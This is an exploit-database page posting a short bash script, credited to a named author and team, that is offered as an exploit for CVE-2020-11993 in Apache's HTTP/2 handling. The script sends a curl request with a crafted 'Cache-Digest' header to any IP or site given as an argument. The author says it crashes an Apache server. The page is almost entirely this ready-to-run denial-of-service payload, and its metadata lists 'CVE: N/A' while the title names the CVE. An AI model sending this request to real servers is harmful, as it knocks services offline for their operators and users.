Push Diary Crash on Specifically Crafted HTTP/2 Header (CVE-2020-11993)

2020.09.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Push Diary Crash on Specifically Crafted HTTP/2 Header (CVE-2020-11993) # Exploit Author: Obaida Ismail # Team: Project Sigma Team # Telegram: https://t.me/ProjectSigmaTeam # This is the exploit script , this script crash apache server ------------------------ #!/bin/bash if [ $# -lt 1 ] then echo "Usage : bash $0 [ip or site]" elif [ $# -gt 1 ] then echo "Usage : bash $0 [ip or site]" else curl -i -H "Cache-Digest: EA9BQQ==" -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" -X GET $1 fi ------------------------


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top